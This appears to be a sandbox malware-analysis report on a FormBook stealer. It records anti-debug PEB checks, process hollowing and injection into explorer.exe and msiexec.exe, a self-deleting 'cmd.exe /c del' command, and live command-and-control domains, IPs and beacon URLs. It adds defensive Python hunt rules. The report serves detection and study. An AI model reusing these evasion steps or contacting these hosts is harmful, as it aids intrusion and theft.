          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0475FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046AC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046D8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046DA61C mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_04761608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046B76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046D16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_04778ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046D36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046E8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_0475FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_04770EA5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_047246A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_0473FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046BFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_04778F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046BEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046A4F2E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046CB73D mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046DE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_0473FF10 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046DA70E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_0477070D mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046CF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046E37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_04727794 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046B8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_04771074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_04762073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046C0050 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046D002D mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046BB02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046CA830 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_04774015 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_04727016 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046A58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046CB8E4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046A40E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_0473B8D0 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_0473B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046E90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046D20A0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046DF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046DF0BF mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046A9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_04723884 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046AC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046AB171 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046CB944 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046C4120 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046C4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 7_2_046D513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe  Process queried: DebugPort
Source: C:\Windows\SysWOW64\msiexec.exe  Process queried: DebugPort
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe  Code function: 1_2_0040ACE0 LdrLoadDll,
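The `mov eax, dword ptr fs:[00000030h]` reads listed above fetch the PEB pointer from the TEB (fs:[30h] in 32-bit and WOW64 code, which is why they show up in the SysWOW64 msiexec.exe host). The two PEB fields a debugger check then consults are BeingDebugged (offset 0x02) and NtGlobalFlag (offset 0x68 in the 32-bit PEB), and the "Process queried: DebugPort" lines are the NtQueryInformationProcess(ProcessDebugPort) form of the same check. The Python below is an added illustration, not code from the sample or the report: it builds a fake 32-bit PEB in memory and applies the two PEB heuristics so the offsets and flag values can be verified offline. The PEB buffer, its contents and the ProcessHeap value are constructed.

```python
"""Decode the 32-bit PEB fields that fs:[30h]-based debugger checks read.

Constructed example: a fake PEB buffer is built in memory; no Windows API is
called. Offsets are those of the 32-bit (WOW64) PEB, which is what the
SysWOW64 msiexec.exe code in the report addresses through fs:[00000030h].
"""
import struct

PEB32_SIZE = 0x100

# 32-bit PEB offsets (from the public ntdll type information)
OFF_BEING_DEBUGGED = 0x02   # UCHAR BeingDebugged
OFF_PROCESS_HEAP = 0x18     # PVOID ProcessHeap
OFF_NT_GLOBAL_FLAG = 0x68   # ULONG NtGlobalFlag

# NtGlobalFlag bits a process gets when it is created under a debugger
FLG_HEAP_ENABLE_TAIL_CHECK = 0x10
FLG_HEAP_ENABLE_FREE_CHECK = 0x20
FLG_HEAP_VALIDATE_PARAMETERS = 0x40
DEBUGGER_HEAP_FLAGS = (FLG_HEAP_ENABLE_TAIL_CHECK
                       | FLG_HEAP_ENABLE_FREE_CHECK
                       | FLG_HEAP_VALIDATE_PARAMETERS)  # 0x70


def build_peb32(being_debugged: bool, nt_global_flag: int,
                process_heap: int = 0x00890000) -> bytes:
    """Construct a minimal 32-bit PEB image for offline testing (not a real PEB).
    process_heap is an arbitrary placeholder value."""
    peb = bytearray(PEB32_SIZE)
    struct.pack_into("<B", peb, OFF_BEING_DEBUGGED, 1 if being_debugged else 0)
    struct.pack_into("<I", peb, OFF_PROCESS_HEAP, process_heap)
    struct.pack_into("<I", peb, OFF_NT_GLOBAL_FLAG, nt_global_flag)
    return bytes(peb)


def read_being_debugged(peb: bytes) -> bool:
    """Equivalent of: mov eax, fs:[30h]; movzx eax, byte ptr [eax+2]"""
    return struct.unpack_from("<B", peb, OFF_BEING_DEBUGGED)[0] != 0


def read_nt_global_flag(peb: bytes) -> int:
    """Equivalent of: mov eax, fs:[30h]; mov eax, dword ptr [eax+68h]"""
    return struct.unpack_from("<I", peb, OFF_NT_GLOBAL_FLAG)[0]


def debugger_suspected(peb: bytes) -> dict:
    """Apply the two classic PEB heuristics and report which one fired."""
    flag = read_nt_global_flag(peb)
    return {
        "BeingDebugged": read_being_debugged(peb),
        "NtGlobalFlag": flag,
        "heap_debug_flags_set": (flag & DEBUGGER_HEAP_FLAGS) == DEBUGGER_HEAP_FLAGS,
    }


if __name__ == "__main__":
    clean = build_peb32(being_debugged=False, nt_global_flag=0)
    debugged = build_peb32(being_debugged=True, nt_global_flag=DEBUGGER_HEAP_FLAGS)
    print("clean   :", debugger_suspected(clean))
    print("debugged:", debugger_suspected(debugged))
```

Both checks are defeated by anti-anti-debug plugins that clear BeingDebugged and mask the NtGlobalFlag heap bits, which is why samples like this one also carry the RDTSC timing check noted in the overview; when tracing such a sample, expect all three to run before the injection stage.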

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe  Domain query: www.alibabasdeli.com
Source: C:\Windows\explorer.exe  Domain query: www.nanasyhogar.com
Source: C:\Windows\explorer.exe  Network Connect: 172.67.173.57 80
Source: C:\Windows\explorer.exe  Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe  Network Connect: 50.31.177.38 80
Source: C:\Windows\explorer.exe  Domain query: www.gigasupplies.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe  Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 890000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe  Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe  Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe  Memory written: C:\Users\user\Desktop\nji3Lg1ot6.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe  Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe  Thread register set: target process: 3352
Source: C:\Windows\SysWOW64\msiexec.exe  Thread register set: target process: 3352
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe  Process created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe"
Source: C:\Windows\SysWOW64\msiexec.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
Source: explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmp  Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.322349912.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.373413712.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.297387525.0000000000B68000.00000004.00000020.sdmp  Binary or memory string: Progman\Pr
Source: explorer.exe, 00000003.00000000.311624897.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmp  Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmp  Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmp  Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.330530785.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.314804164.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.303384073.0000000008778000.00000004.00000001.sdmp  Binary or memory string: Shell_TrayWndh
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe  Code function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
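The chain documented in this section (the sample re-launching itself, the hollowed child, explorer.exe beaconing on port 80, msiexec.exe spawning `cmd.exe /c del` on the original file) maps onto three endpoint hunt rules. The Python below is an added example, not part of the report, and runs those rules over constructed Sysmon-style ProcessCreate (EventID 1) and NetworkConnect (EventID 3) events that mirror the tree above; PIDs, ports, the notepad.exe noise entry and the field names are assumptions. The last rule deliberately keys on the deleting process's parent being a system binary rather than the deleted file itself, because that break in the process ancestry is what injection looks like in telemetry.

```python
"""Hunt rules for the injection chain in this report, run over constructed
Sysmon-style events (EventID 1 = ProcessCreate, 3 = NetworkConnect).

The EVENTS list is made up to mirror the report's process tree; it is not a
real log. PIDs, ports and the benign notepad.exe entry are arbitrary."""
import re
from typing import Dict, List, Tuple

Event = Dict[str, object]

# Processes that should not be making outbound HTTP on their own. explorer.exe
# does talk to SMB/WebDAV shares and some Microsoft endpoints, so in production
# this needs a destination allow-list; here it is deliberately strict.
SYSTEM_SHELL_IMAGES = {r"c:\windows\explorer.exe"}
CMD_IMAGES = {r"c:\windows\system32\cmd.exe", r"c:\windows\syswow64\cmd.exe"}

EVENTS: List[Event] = [
    {"EventID": 1, "ProcessId": 1001, "ParentProcessId": 900,
     "Image": r"C:\Users\user\Desktop\nji3Lg1ot6.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Users\user\Desktop\nji3Lg1ot6.exe"'},
    # sample re-launches itself: the hollowing target in the report
    {"EventID": 1, "ProcessId": 1002, "ParentProcessId": 1001,
     "Image": r"C:\Users\user\Desktop\nji3Lg1ot6.exe",
     "ParentImage": r"C:\Users\user\Desktop\nji3Lg1ot6.exe",
     "CommandLine": r'"C:\Users\user\Desktop\nji3Lg1ot6.exe"'},
    # injected explorer.exe beacons to two of the report's C2 IPs
    {"EventID": 3, "ProcessId": 900, "Image": r"C:\Windows\explorer.exe",
     "DestinationIp": "50.31.177.38", "DestinationPort": 80, "Initiated": True},
    {"EventID": 3, "ProcessId": 900, "Image": r"C:\Windows\explorer.exe",
     "DestinationIp": "172.67.173.57", "DestinationPort": 80, "Initiated": True},
    # explorer.exe starts msiexec.exe, which is injected and spawns the self-delete
    {"EventID": 1, "ProcessId": 1003, "ParentProcessId": 900,
     "Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\SysWOW64\msiexec.exe"},
    {"EventID": 1, "ProcessId": 1004, "ParentProcessId": 1003,
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": r'/c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"'},
    # benign noise that must not fire
    {"EventID": 1, "ProcessId": 1005, "ParentProcessId": 900,
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]


def _norm(path: object) -> str:
    return str(path).lower()


def rule_self_respawn(events: List[Event]) -> List[int]:
    """A binary outside C:\\Windows starting a second copy of itself. Weak on
    its own (installers do it), but it is the staging step that precedes the
    'Section unmapped ... base address' hollowing evidence in the report."""
    return [int(e["ProcessId"]) for e in events
            if e["EventID"] == 1
            and _norm(e["Image"]) == _norm(e["ParentImage"])
            and not _norm(e["Image"]).startswith("c:\\windows\\")]


def rule_shell_network(events: List[Event], ports=(80, 443)) -> List[str]:
    """Outbound HTTP(S) initiated by explorer.exe: the report's
    'System process connects to network' signature."""
    return [str(e["DestinationIp"]) for e in events
            if e["EventID"] == 3 and e.get("Initiated")
            and _norm(e["Image"]) in SYSTEM_SHELL_IMAGES
            and e["DestinationPort"] in ports]


DEL_RE = re.compile(r'\bdel\b\s+"?([^"]+?\.exe)"?', re.IGNORECASE)


def rule_self_delete(events: List[Event]) -> List[Tuple[str, str]]:
    """cmd.exe '/c del <file>' where <file> is the image of a process seen
    earlier in the log. Returns (parent of cmd.exe, deleted image)."""
    seen_images = {_norm(e["Image"]) for e in events if e["EventID"] == 1}
    hits = []
    for e in events:
        if e["EventID"] != 1 or _norm(e["Image"]) not in CMD_IMAGES:
            continue
        m = DEL_RE.search(str(e["CommandLine"]))
        if m and _norm(m.group(1)) in seen_images:
            hits.append((_norm(e["ParentImage"]), _norm(m.group(1))))
    return hits


def run_all(events: List[Event]) -> Dict[str, object]:
    return {"self_respawn": rule_self_respawn(events),
            "shell_network": rule_shell_network(events),
            "self_delete": rule_self_delete(events)}


if __name__ == "__main__":
    for name, hits in run_all(EVENTS).items():
        print(f"{name}: {hits}")
```

In a real deployment the self-delete hit is the highest-confidence of the three, since a legitimate uninstaller deletes from its own process tree, not from a msiexec.exe that was started with no arguments by explorer.exe.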

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match  File source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match  File source: the same 11 unpacked PE files and 12 memory dumps listed for this signature under Stealing of Sensitive Information above (the report attaches one signature to both categories)

Mitre Att&ck Matrix

Techniques with at least one matching signature, by tactic. The digits after a technique name are the report's per-technique signature-count badges, which extraction ran together with the name; matrix cells without a badge are template filler and are omitted here.

Execution: Native API 1; Shared Modules 1
Persistence: DLL Side-Loading 1
Privilege Escalation: Process Injection 612; DLL Side-Loading 1
Defense Evasion: Rootkit 1; Virtualization/Sandbox Evasion 2; Process Injection 612; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 2; Software Packing 1; DLL Side-Loading 1; File Deletion 1
Credential Access: Credential API Hooking 1
Discovery: Security Software Discovery 121; Virtualization/Sandbox Evasion 2; Process Discovery 2; Remote System Discovery 1; File and Directory Discovery 2; System Information Discovery 13
Collection: Credential API Hooking 1; Archive Collected Data 1; Clipboard Data 1
Command and Control: Encrypted Channel 1; Ingress Tool Transfer 3; Non-Application Layer Protocol 3; Application Layer Protocol 13
Impact: System Shutdown/Reboot 1
Initial Access, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects: no matched technique

Behavior Graph

Behavior Graph ID: 552997  Sample: nji3Lg1ot6  Start date: 14/01/2022  Architecture: WINDOWS  Score: 100

Process tree as drawn in the graph (a number after a process name is the count badge shown on that node; "(injected)" marks a pre-existing Windows process that received injected code):

Start
  DNS/IP: www.mnbvending.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures
  +- nji3Lg1ot6.exe 19 (started)
     Dropped: C:\Users\user\AppData\Local\...\mtmmtvzho.dll, PE32
     Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
     +- nji3Lg1ot6.exe (started)
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        +- explorer.exe (injected)
           DNS/IP: nanasyhogar.com 50.31.177.38 port 80 (source port 49793), SERVERCENTRALUS, United States; www.alibabasdeli.com 172.67.173.57 port 80 (source port 49808), CLOUDFLARENETUS, United States; 4 other IPs or domains
           Signatures: System process connects to network (likely due to code injection or exploit)
           +- msiexec.exe (started)
              Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
              +- cmd.exe 1 (started)
                 +- conhost.exe (started)
           +- autochk.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
nji3Lg1ot6.exe | 38% | Virustotal |
nji3Lg1ot6.exe | 42% | ReversingLabs | Win32.Worm.SpyBot
nji3Lg1ot6.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
7.2.msiexec.exe.4baf840.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
7.2.msiexec.exe.2c5b358.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.2.nji3Lg1ot6.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.1.nji3Lg1ot6.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.nji3Lg1ot6.exe.400000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.nji3Lg1ot6.exe.23e0000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.nji3Lg1ot6.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.nji3Lg1ot6.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner | Label
www.mnbvending.com | 0% | Virustotal |
www.alibabasdeli.com | 0% | Virustotal |
shops.myshopify.com | 1% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://www.nanasyhogar.com/nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf | 0% | Avira URL Cloud | safe
www.rthearts.com/nk6l/ | 0% | Avira URL Cloud | safe
http://www.alibabasdeli.com/nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf | 0% | Avira URL Cloud | safe
http://www.gigasupplies.com/nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.mnbvending.com | 199.59.243.200 | true | false | | unknown
www.alibabasdeli.com | 172.67.173.57 | true | true | | unknown
nanasyhogar.com | 50.31.177.38 | true | true | | unknown
shops.myshopify.com | 23.227.38.74 | true | true | | unknown
www.nanasyhogar.com | unknown | unknown | true | | unknown
www.gigasupplies.com | unknown | unknown | true | | unknown

                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.nanasyhogar.com/nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf | true | Avira URL Cloud: safe | unknown
www.rthearts.com/nk6l/ | true | Avira URL Cloud: safe | low
http://www.alibabasdeli.com/nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf | true | Avira URL Cloud: safe | unknown
http://www.gigasupplies.com/nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf | true | Avira URL Cloud: safe | unknown
